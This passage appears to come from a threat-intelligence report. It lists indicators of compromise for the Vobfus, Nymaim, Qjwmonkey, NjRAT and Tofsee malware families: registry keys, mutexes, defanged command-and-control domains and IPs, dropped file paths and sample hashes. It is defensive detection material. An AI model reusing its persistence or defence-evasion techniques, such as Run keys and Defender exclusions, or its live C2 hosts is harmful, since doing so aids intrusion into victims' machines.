`%TEMP%\imopeshvj.vbs`	1
`%TEMP%\paybqnqnd.vbs`	1
`%TEMP%\ntvxzbqf.vbs`	1
`%TEMP%\rvxmapdsgv.vbs`	1
`%TEMP%\dkaqshjynd.vbs`	1
`%TEMP%\vbdsgvjy.vbs`	1
`%TEMP%\noqftiwlzo.vbs`	1
`%TEMP%\ovxncegixm.vbs`	1
`%TEMP%\qhxurnkcs.vbs`	1
`%TEMP%\eyaodrgujx.vbs`	1
`%TEMP%\zyvhdvlis.vbs`	1
`%TEMP%\zdrshixlao.vbs`	1
`%TEMP%\waoqethv.vbs`	1
`%TEMP%\ulabqeth.vbs`	1
`%TEMP%\othjxmapd.vbs`	1
`%TEMP%\zdeguvky.vbs`	1
`%TEMP%\gzgjxmoqeg.vbs`	1
`%TEMP%\fqwzqhkh.vbs`	1
`%TEMP%\ulabqrguix.vbs`	1
`%TEMP%\vrfxlaods.vbs`	1
See JSON for more IOCs

File Hashes

0477c2b9ba7eecc8b0827400576860257e62a306a3e0c310eb84c537ec47e018
13287e727a2be4b6a3533e768b4babfd9191ec65002abcdf77c43e69278963be
1d7633311c1f671c60422a4d6723aa10a37e833e2d5df732f3988b3e379b2ee9
2a38fbbcef4bc83582ccd98c9bf96ff29e4c915d90802ec799420420f2cad6e6
2b19de056a388d0ee3672be895f4e446c42053034c68675585dd3fb54b8d1eb7
3821a10495fb4759fbab1ef7868eeb1e207ea6bf4211370f072b0215a14b46c8
3ae58dca3ce80c3ed4b65f610eee921dbeb3343619caace78c6afe21ec237f08
3d54f0fbd50f0b91f635a9ecc89ef8cb58c021bb60326b5fa2db75989d1bff5a
3fdd3b5333f7e526e80599add12fdeef663c59ad79ef4e714912043038377730
47c349433e77aefb18ea384f6ab4759f7bd49466f7a747255d19d4648fecc762
49752684078dfa74cd25adbbdc9bbf7a98e6f96f5355cd52b8b77738506673e7
4e5a282c7230242d090844875c9f5c432dc2c4bad3ba13fa2a7df86843785f75
53e08241abdfe3f13d6aa875642638d1badc6ec59cdb9757fe0fd598dc736927
57fc8d1737521cb0af37fcf70079603dc0eb5da1b3bbef9bad334dfe79176068
5ba20f4aaf94b4f418501ae977d1f6cf947accf8134c3b9487b42cdd65ef715b
5fab1a54d1338b2cb906aae3b2f5292d47445aae2af383c2a0e99b4ccf863262
60f6548844d59e59dc90a12fcb97396793c20687947a6eb5cc543debecf607d1
61caab6c70480cd6db4f33234cfc86467bff26c2e19b804211be8c822218a940
623fbdc46be1a797f743894e3e1cc003a29692d6fb9b3246de80282207d99b9c
63746003a0c8fcdf11f9367ca5102c8413ee5e2cd298079de5a3ab0ba5493ea7
66b770d0d2e02739e0495d30f9f56c717989eec3f1da96c7ffa01b05deffeb37
68d644144b33f4766a3e11a33c471cf877d5801e1833d1d1813d4a06125ff2a9
6a820f70fc59abd8d0b5202de65a9fc51312d18322e55b24d1f63a2339ff13d3
6cb616c3229fd37e2615de709496215cc9138436b16eab265e9feae9d81cfac2
6ed77af0d3929a62256c7aac5068ff7ca337460cb813863d7c528e95f503cc59
See JSON for more IOCs

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Worm.Vobfus-6992861-0

Indicators of Compromise

Registry Keys	Occurrences
`<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WindowsUpdate`	25
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED Value Name: ShowSuperHidden`	25
`<HKLM>\SOFTWARE\WOW6432NODE\Policies`	25
`<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\WindowsUpdate\AU`	25
`<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\AU`	25
`<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\AU Value Name: NoAutoUpdate`	25
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: jauxec`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: qiusooj`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: mokiy`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: wiiorit`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: kuivuo`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: viezus`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: fonef`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: znxaaq`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: reiiraj`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: wauul`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: wlcug`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: wzzuf`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: laociek`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: tioila`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: tstoj`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: yeeuqov`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: vyjuos`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: zeuub`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: teozuim`	1

Mutexes	Occurrences
`\BaseNamedObjects\A`	25

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
`216[.]218[.]206[.]69`	1

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
`ns1[.]helpchecks[.]com`	25
`ns1[.]helpchecks[.]info`	25
`ns1[.]helpchecks[.]at`	25
`ns1[.]helpchecks[.]eu`	25
`ns1[.]helpchecks[.]by`	25
`ns1[.]helpcheck1[.]org`	25
`ns1[.]helpcheck1[.]com`	25
`ns1[.]helpcheck1[.]net`	25

Files and or directories created	Occurrences
`\??\E:\autorun.inf`	25
`\autorun.inf`	25
`\??\E:\System Volume Information.exe`	25
`\System Volume Information.exe`	25
`\$RECYCLE.BIN.exe`	25
`\??\E:\$RECYCLE.BIN.exe`	25
`\Secret.exe`	25
`\??\E:\Passwords.exe`	25
`\??\E:\Porn.exe`	25
`\??\E:\Secret.exe`	25
`\??\E:\x.mpeg`	25
`\Passwords.exe`	25
`\Porn.exe`	25
`\Sexy.exe`	25
`%HOMEPATH%\Passwords.exe`	25
`%HOMEPATH%\Porn.exe`	25
`%HOMEPATH%\Secret.exe`	25
`%HOMEPATH%\Sexy.exe`	25
`\??\E:\Sexy.exe`	24
`%HOMEPATH%\Passwords.exe (copy)`	24
`%HOMEPATH%\Porn.exe (copy)`	24
`%HOMEPATH%\RCX1.tmp`	24
`%HOMEPATH%\RCX2.tmp`	24
`%HOMEPATH%\RCX3.tmp`	24
`%HOMEPATH%\RCX4.tmp`	24
See JSON for more IOCs

File Hashes

03f2507d1db297b7176fddce8540639e2a8986045af7d4cf27b09a424629a08d
181896288ffa6cfea0d847eda1cbce7462fbdfbf6536c6b6d874155f8d23058c
366c47a2774078e135f48b03f4facbbba80aa4e294d523f0112d1cf001a93e4a
59570b2c73227359544e6c7fde4ba2368170ca48482cdb530de097bb833c177d
5a8e8c501cc8864d928beddb8837e0ce70f272a9a6ae13d175dfcbe52d2f3d7e
5b4ebc908f6cff3ad1acc262790b3b7ad1e2e65031c7b0f8c55f700ae499f40d
5c314363a05429b3a76149ed8a0ab9b9342b69d76794ba9d02e3ab09092ff4ad
5f06f5540689bd9346ae76995c25e8efd60d10c22ec9f6723cd6467dabd0b78e
60398eff74f6a02cd6dad118d7dc028102b56b20dc6ff7bc0c383b6accdac8e9
60b898046d99e11912349e895685616d5c59a1d0e6d05fa23fdb654a96c67931
62070e7ac4e86195d915ffecd132823e178fb7eaad331fea65926fa2bb80f23b
6b63b301a133703b5a6fe3c99c4e2c5a421490daf2a26682a83b95b1eaecb186
71999972c8bd0259bab9d76a6e2d9525a141ad7ba151d0b8bf77876b6d6660c7
7271cb745dcca0d0bb516b7ff4cd69d2c5c261df33e48091890450ca789ae081
753c11420e4a06bcb790a51918923c564c6da62c46d923eeb3541e342667a453
75a188c634a0c857220ee7c6ad848293ec08d1d8a9f6027f39a02194665edffe
7da2c1a73cfa87b1a66d4c0bbe2b1b18ae7540e3ae4de407092fe5f56a44d772
80107ca033df25818e9bb64aed5f088c98b4c75d8a3ed3d3a47bb0f2660a2b2d
8b76268bc5255134ff460ee3356797657f98f8a0cc6fef98d0e173e367b6734b
92944feb88a896a922c9a88fef2683e864b931fd919c4405eeab4ed6cc2a7e02
a3b82b5badf315c723973a8e8d8441351a6aea76541d888bdf1db29fd4b3721b
ae5a2a2a0cd106146aa40390596bba6c72fa7d8c75ab237b3cbb040946fcac19
afb4401b564b6330f107b4a8d95e7d28429957929140a84ee99f01eae3fc5619
b3f564ef2e4550601f2728da6eec584fadcb7b5060a0df91ed2cbf4e306c5189
c80909dfb38fc5646008338b31bf576275d59c5880403adc8e5bb072eec9ce1b
See JSON for more IOCs

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Dropper.Nymaim-6992731-0

Indicators of Compromise

Registry Keys	Occurrences
`<HKCU>\Software\Microsoft\GOCFK`	24
`<HKCU>\SOFTWARE\MICROSOFT\GOCFK Value Name: mbijg`	24

Mutexes	Occurrences
`Local\{369514D7-C789-5986-2D19-AB81D1DD3BA1}`	24
`Local\{D0BDC0D1-57A4-C2CF-6C93-0085B58FFA2A}`	24
`Local\{F04311D2-A565-19AE-AB73-281BA7FE97B5}`	24
`Local\{F6F578C7-92FE-B7B1-40CF-049F3710A368}`	24
`Local\{306BA354-8414-ABA3-77E9-7A7F347C71F4}`	24
`Local\{F58B5142-BC49-9662-B172-EA3D10CAA47A}`	24
`Local\{C170B740-57D9-9B0B-7A4E-7D6ABFCDE15D}`	24
`Local\{764A5E5B-9D8B-4E3E-3AE5-6BA089B04B34}`	24
`Local\{D6E0445C-66CF-7E18-EE4D-5700342376D0}`	24

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
`66[.]220[.]23[.]114`	24
`64[.]71[.]188[.]178`	18
`184[.]105[.]76[.]250`	18

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
`jexzc[.]in`	24
`nenpzs[.]com`	23

Files and or directories created	Occurrences
`%ProgramData%\ph`	24
`%ProgramData%\ph\fktiipx.ftf`	24
`%TEMP%\gocf.ksv`	24
`%TEMP%\fro.dfx`	23
`\Documents and Settings\All Users\pxs\pil.ohu`	23
`%LOCALAPPDATA%\giy4vh3`	5
`%APPDATA%\io77x`	5
`%LOCALAPPDATA%\av1165d`	5
`%APPDATA%\tv2`	5
`%ProgramData%\0c7`	4
`%LOCALAPPDATA%\g816`	4
`%APPDATA%\p3f`	4
`%LOCALAPPDATA%\r4v2rp`	4
`%APPDATA%\3w7`	4
`%ProgramData%\3e9sq`	3
`%ProgramData%\qi39`	3
`%LOCALAPPDATA%\yp870bk`	3
`%ProgramData%\4b8s2`	3
`%ProgramData%\q8216p`	3
`%ProgramData%\94z`	2
`%ProgramData%\igzk4`	2
`%LOCALAPPDATA%\ycq1ac`	2
`%APPDATA%\867j`	2
`%ProgramData%\9d0g9`	2
`%ProgramData%\0186d9m`	2
See JSON for more IOCs

File Hashes

08beb94545dabf135ef630b432f00fc603f3797328b5a9681d9d1a8041238147
0be51b6a0e11b6d807c4e6d2eea49b0c9e60c23babbb48ff17c27ee2e2050eef
0fee18d7562b359c642e4a953d08251b36c3971f8fc9dbfce46af98fe26f04e8
160fb874c1e78de9cb2e7d6a829e5f1e40aba2edae9de7a274a9639b80b6df9d
17b5939fc77e2acb9a76c9baa6c4de01822ef4633da4732a49c4cd26f2ff024c
1bef5f7889b5b8528bd9f20d6218dd4faa6ff70ad60cfd182e80374045ff9faf
281bae2b93ae03725217deac68fd1f513d0a0267dda486e4d2d51f92044c8fca
41d57f15b7c1ffd1c4bc5af862da97963405eace4c67574d68fcd39eb4dbe6c0
44b688082d3305d8e0d29bf7d6d78b60078592f1bda83a90ec6d227823d0e297
4cde92c748f5aa5912a83d075dae2241de2496d4f4cf8e69a04a65c2080ff0b8
507340f713f0c6f4172253b20bab21bdc6dbdd7ad4866d037894acdf167c60dc
50a3f7c98b739d33ff4ba7b3ef38e553a42d7b47bc8b34f2d877055da9eaa1e9
514affb7cd921abb88040abc8beb7af9139488da9f625dfb8647fdab665c38c5
5bf35c74cfc5908e266e3d59615a16b30eb9b6de68759fe346257b420edf6748
67989a565971fbe6f02c909b0696edc0de6ec1234129c4df4455a1f63a702189
69f167f13f7e93a17d8dfaf59eb97014aa1446db339e300982aa8dc5ca3f14e3
70e414e8f7895b3ed7dec9e71693f1f8ca9ad6421fe9b3c0d38280cdb1c4608a
74bb6e3a0ddaf3f2d7ad6e12513004c6efd77ad6a21f2faeef0fedd214f5f3fc
74d43a9e8803c815e03184619fe2ea10029e8db22c68a24290495b506fcea48e
7b6a3b68714b06b9f749a20c22461ff0c7e0759f7a5ca8d51e318dec2d88be51
7eb6295c6f70a823a6a02f1728cb16827c545737e0b7a0a5a1cb06ebbcf965a5
82c92424c692ee6769d9e2f3e9e9accf5c45794cd27b95a68f507eff88850a98
83929ceb3274a34650127a4cb9ccac5b5bcb559fd43f39b6b64081bd3255dccb
8c665d48bddc2f4436223689fd97f11790481f8df7f0e4c91af31aed0b4a4711
91e25ed856ffb9ea7cea06e4de5e5eb689063324e9268730e03cd34f4dc3ee68
See JSON for more IOCs

Coverage

Screenshots of Detection

AMP

ThreatGrid

PUA.Win.Adware.Qjwmonkey-6992589-0

Indicators of Compromise

Registry Keys	Occurrences
N/A	-

Mutexes	Occurrences
`ATL:MemData03EAPC`	10
`\BaseNamedObjects\ATL:MemData03EA899552`	1
`\BaseNamedObjects\ATL:MemData03EA830021`	1
`\BaseNamedObjects\ATL:MemData03EA841675`	1
`\BaseNamedObjects\ATL:MemData03EA358075`	1
`\BaseNamedObjects\ATL:MemData03EA675052`	1
`\BaseNamedObjects\ATL:MemData03EA134349`	1
`\BaseNamedObjects\ATL:MemData03EA414408`	1
`\BaseNamedObjects\ATL:MemData03EA124406`	1
`\BaseNamedObjects\ATL:MemData03EA651689`	1
`\BaseNamedObjects\ATL:MemData03EA172892`	1

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
`47[.]102[.]38[.]15`	10
`39[.]108[.]27[.]173`	9
`47[.]95[.]181[.]45`	2
`36[.]99[.]227[.]233`	1

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
`x[.]93ne[.]com`	10
`cdn[.]zry97[.]com`	1

Files and or directories created	Occurrences
`%System32%\d3d9caps.dat (copy)`	10
`%System32%\d3d9caps.tmp`	10
`%APPDATA%\GlobalMgr.db`	10

File Hashes

068eda364702ce61530d3b06ff1edb490fa157572ebf936ad9ad0d913c44e46d
0c748be9a32bc9ce08709f67a45fc9e3e76a06b6e30091ea6e75014651449bd6
1211299848ddadcaefe019ade6a5394a744297e5fbe8182d0156faffe2f40e34
275b0dad9af4cad57d9fe546b7f8c11e55b848b2ca68959bbe8d45fc3195a85b
326d9df48f47cad42b8a6bac64061b9e2592d62ad5c8fd2a727865f84a79b6c9
32a0d53d2716251728d4120e5cceb4eb8894fd830841d9476820cd868420d37a
6f5854d4dce3170393d74fb216573d08b694d7ec2982f02d3e46fe34b3ba0ed7
70ab5cb1653e39937408d71b70c9bd3952c572a2b54bc2b039794130efe5ae77
8da41212571b8b910ec657bc8f1b67ef22dd3c15e40280d5c6f93a5104227c0f
90a457c02c2e659902d1be908c53c38eec47574101f14477c22ec87968b5b870
9ae31bf1c30051d3438f3548d5f7593c24aa9297cb9f89b26b04d01482f77622
9dcb833bbac2d4fabafe49babb53b127349be1ee1444031cccb77d2752206813
c3e2f2e2e17f0408b11bd9cc8dc3ea97364fec6d3dea07ba896901d24f89fef4
c48b5755d64f2fa9fe6bdeec4605d5352e196db78d507608fc9f181be93f9da1
c4e26e43528d8be9dba86a1b7c30b4ef8bdca67b56bbcab2d7fc76cb12004b14
c88992429426ed40e4a5ff37c0ff0b3ecdb52a07f7e6b4b2377a6c4160263419
d29b9fa55f21577991f220bec9bbc89969e843b6b03f7dad0084e80b86961c97
d2bcb4e712ee873f8cce82a2783b84bf2a11f275e9064581cf00fd88323e803d
dace1d73cd93785decdc4993f12de1b214b0a836539063c5fac8b154ce948eb1
db55da939400d9d718b39e20280da3317cd1d35a522ec4927b059fefea4aa754
df38320eb4d1eedf53b9927cb734bf2506e3d38d04c9279e65aea08391bc6caa
e8a913bb3211a926e04ce387dadf74d262e287070ad08192153b4a07f8914544
ed613488a7bdde693d5b819ce946a8e9865426b9ea7cbbab8a867dc4db79d483

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Packed.NjRAT-6992540-1

Indicators of Compromise

Registry Keys	Occurrences
`<HKLM>\System\CurrentControlSet\Services\NapAgent\Shas`	32
`<HKLM>\System\CurrentControlSet\Services\NapAgent\Qecs`	32
`<HKLM>\System\CurrentControlSet\Services\NapAgent\LocalConfig`	32
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NAPAGENT\LOCALCONFIG\Enroll\HcsGroups`	32
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NAPAGENT\LOCALCONFIG\UI`	32
`<HKU>\S-1-5-21-2580483871-590521980-3826313501-500 Value Name: di`	32
`<HKCU>\ENVIRONMENT Value Name: SEE_MASK_NOZONECHECKS`	32
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON Value Name: ParseAutoexec`	32
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: 7a6058fe5633bcc68b913467734f0f12`	1
`<HKCU>\SOFTWARE\7A6058FE5633BCC68B913467734F0F12 Value Name: [kl]`	1
`<HKCU>\Software\5d6c253999006e0a364768488fca8056`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: 5d6c253999006e0a364768488fca8056`	1
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: 5d6c253999006e0a364768488fca8056`	1
`<HKCU>\SOFTWARE\5D6C253999006E0A364768488FCA8056 Value Name: [kl]`	1
`<HKCU>\Software\81d13862f7a9e91b88ef1cf04880f30b`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: 81d13862f7a9e91b88ef1cf04880f30b`	1
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: 81d13862f7a9e91b88ef1cf04880f30b`	1
`<HKCU>\Software\c4356a2f1cc184765354ac346ff3c760`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: c4356a2f1cc184765354ac346ff3c760`	1
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: c4356a2f1cc184765354ac346ff3c760`	1
`<HKCU>\SOFTWARE\81D13862F7A9E91B88EF1CF04880F30B Value Name: [kl]`	1
`<HKCU>\SOFTWARE\C4356A2F1CC184765354AC346FF3C760 Value Name: [kl]`	1
`<HKCU>\Software\92c90be64c51c97abffcb0136889e008`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: 92c90be64c51c97abffcb0136889e008`	1
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: 92c90be64c51c97abffcb0136889e008`	1

Mutexes	Occurrences
`\BaseNamedObjects\23f0e3bce589df29a3e6f3e8879b41c1`	1
`cf56ee275cc59274062dc1b03224ca99`	1
`7224ecb50ef565a251e4dca6d8280c72`	1
`ddb5e6e34f69e8c18573f23e18eb66b5`	1
`dbac86ee556aeefaf987b893994aa8a6`	1
`9933a39bcdb4ca2ba91ddfbf0eb49c28`	1
`27e6ba15367cfc6ccdb30fd12c8ebc9a`	1
`551c2891c1a5b14d85bd8205beca398a`	1
`6f548f49442e3cf6cd712e1421ced30b`	1
`ea48d06232228d6119e51286c4c0d7cb`	1
`6843bfb57b172a29eaca1016ea14dd34`	1
`b6a24dab009c0449997c4b895176ddee`	1
`b17b3051ec3895b563f6189b117c7103`	1
`61d4512a2b96204a3981459fa733229e`	1
`b1471de1dda54e505e7a2fe5dc250cbd`	1
`5b9aa31356f88f5efd2d650bab2fd205`	1
`227ae895ae9adabb3c9cc7efd9b8f180`	1
`cf10c5de3b577ea5f5b8886499972c21`	1
`89ced9869827e13512140dfd15310bdb`	1
`7a6058fe5633bcc68b913467734f0f12`	1
`5d6c253999006e0a364768488fca8056`	1
`81d13862f7a9e91b88ef1cf04880f30b`	1
`c4356a2f1cc184765354ac346ff3c760`	1
`92c90be64c51c97abffcb0136889e008`	1
`d8cff2de0df1355a3d74ec30295aa1da`	1
See JSON for more IOCs

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
`2[.]91[.]138[.]211`	2
`197[.]206[.]180[.]205`	1
`85[.]170[.]230[.]163`	1
`185[.]17[.]1[.]245`	1

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
`youwave932[.]no-ip[.]biz`	10
`dmar-ksa[.]ddns[.]net`	3
`karem[.]no-ip[.]org`	3
`alkhorsan[.]linkpc[.]net`	2
`sabridz[.]no-ip[.]biz`	1
`alkhorsan2016[.]no-ip[.]biz`	1
`amiramir[.]noip[.]me`	1
`MSKGH[.]DDNS[.]NET`	1
`mskhe[.]ddns[.]net`	1
`paleb[.]no-ip[.]org`	1
`yeswecan[.]duckdns[.]org`	1
`megatn[.]publicvm[.]com`	1

Files and or directories created	Occurrences
`%TEMP%\server.exe`	4
`%TEMP%\svchost.exe`	2
`%TEMP%\svhost.exe`	1
`%APPDATA%\google.exe`	1
`%TEMP%\system.exe`	1
`%TEMP%\win32.exe`	1
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\9933a39bcdb4ca2ba91ddfbf0eb49c28.exe`	1
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\27e6ba15367cfc6ccdb30fd12c8ebc9a.exe`	1
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\551c2891c1a5b14d85bd8205beca398a.exe`	1
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\6f548f49442e3cf6cd712e1421ced30b.exe`	1
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\cb0bc0e4b97025e4a12cd7655f373600.exe`	1
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\ea48d06232228d6119e51286c4c0d7cb.exe`	1
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\6843bfb57b172a29eaca1016ea14dd34.exe`	1
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\b17b3051ec3895b563f6189b117c7103.exe`	1
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\b6a24dab009c0449997c4b895176ddee.exe`	1
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\61d4512a2b96204a3981459fa733229e.exe`	1
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\b1471de1dda54e505e7a2fe5dc250cbd.exe`	1
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\5b9aa31356f88f5efd2d650bab2fd205.exe`	1
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\cf10c5de3b577ea5f5b8886499972c21.exe`	1
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\89ced9869827e13512140dfd15310bdb.exe`	1
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\7a6058fe5633bcc68b913467734f0f12.exe`	1
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\5d6c253999006e0a364768488fca8056.exe`	1
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\81d13862f7a9e91b88ef1cf04880f30b.exe`	1
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\c4356a2f1cc184765354ac346ff3c760.exe`	1
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\92c90be64c51c97abffcb0136889e008.exe`	1
See JSON for more IOCs

File Hashes

04675d38c3f123c6cfe12a8b96c840894985d77a044aa009b6f6a2d1d9bd42a5
070a2b244bfb020dc8c3203831e14d3f27f3a3d5a7bc0df2e1a1acc1b7a5b48a
0bfae405fffc2cb791f7eefb7c4d2efe4b76235289e5a043718bc6ed7480c4f1
0c75f012571cc271d8c19d95b714f425bf6f5ef7b09a646c18cd0b99e0050ede
0e37c0759ded6594cf671c82ea8d8404b2c8ad34c8b7c772d4f4bcdbc01f6b28
133d714e145400b9adc0ac24584745443fee2a9cdcda31bd3251264e46c84607
1444bf151e764ffe3402827f60a142f20a0e6060ad8fb80255e1a82c63ec70e0
146054936453e72343079c7c89517cef5a8e270ba827c321ce6c6740775df7c4
19b06c7cf56e2148202b8051d64823817d8c81afd9e6061e6e625b953439b9eb
26f3184e05046a17a8a470a0ca2088a8774641729eb86c6f84310707014dfb6b
2d4c6b0074ca4866f50c7242882e467a65da7f7dc28fd9c2bbd09caa6f99a8d6
369f407ad2e8321d87ac5f32241d7cf2a0e72aae0b8c0caed4f30faa042ed85e
3bb55a41fa1c485c018b03b521beb74a4baea14bc2b89b8b69713e07079771f9
3d0946ab360b335a58789cc81cb5711e438f312426b2477b2777a256f2b772c6
452ec0f00cee0a7ea6c104d9835af5f3999c50b37d22081dee4b47e75b794cad
469d100e0e62a4099313c485e24f134abd32e598a7f65f147342ac7ea9274f2a
4cd937a9a1914666ebe671b2b9f4db59806dbacd6ae784b10f5b625e1448649f
560a570d89a632b81d34cf4d1e20a86c35657d9211ac4061c419883e2b108e63
5da16143a544f7c51cdd146540b5393113a6768162328cfccb5e484c64472ec6
619b638736132bd02470c09508cb63a3fb753c6ee0f8dab4f4af6c2694f9095f
6323174f37df70906257ac7b545eeed4e1cfaea1cbbba74d5acc49230fadcf73
64f50c68d48d152eba786380b7a1db84f94f28c63f34ccb499008e1889ee0675
694a3485ae77c8e024295e34caf2f335eeb61d4ebcda6fd5789086526ae44a9f
6aacdb0640cda4db32f307b91e4d0d6bb4d88429a14308fb90ec573a9c892afb
7530fc29bdc4ae5be727789818541dafcb590bdd708e64e8bde0a4c99b37b2f7
See JSON for more IOCs

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Malware.Tofsee-6992280-0

Indicators of Compromise

Registry Keys	Occurrences
`<HKLM>\System\CurrentControlSet\Services\NapAgent\Shas`	17
`<HKLM>\System\CurrentControlSet\Services\NapAgent\Qecs`	17
`<HKLM>\System\CurrentControlSet\Control\SecurityProviders\Schannel`	17
`<HKLM>\System\CurrentControlSet\Services\NapAgent\LocalConfig`	17
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NAPAGENT\LOCALCONFIG\Enroll\HcsGroups`	17
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NAPAGENT\LOCALCONFIG\UI`	17
`<HKU>\.DEFAULT\Control Panel\Buses`	17
`<HKU>\.DEFAULT\CONTROL PANEL\BUSES Value Name: Config3`	17
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS Value Name: C:\Windows\SysWOW64\wpdjiqwl`	3
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\wpdjiqwl`	3
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WPDJIQWL Value Name: Type`	3
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WPDJIQWL Value Name: Start`	3
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WPDJIQWL Value Name: ErrorControl`	3
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WPDJIQWL Value Name: DisplayName`	3
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WPDJIQWL Value Name: WOW64`	3
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WPDJIQWL Value Name: ObjectName`	3
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WPDJIQWL Value Name: Description`	3
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WPDJIQWL Value Name: ImagePath`	3
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS Value Name: C:\Windows\SysWOW64\gzntsagv`	2
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\gzntsagv`	2
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\GZNTSAGV Value Name: Type`	2
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\GZNTSAGV Value Name: Start`	2
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\GZNTSAGV Value Name: ErrorControl`	2
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\GZNTSAGV Value Name: DisplayName`	2
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\GZNTSAGV Value Name: WOW64`	2

Mutexes	Occurrences
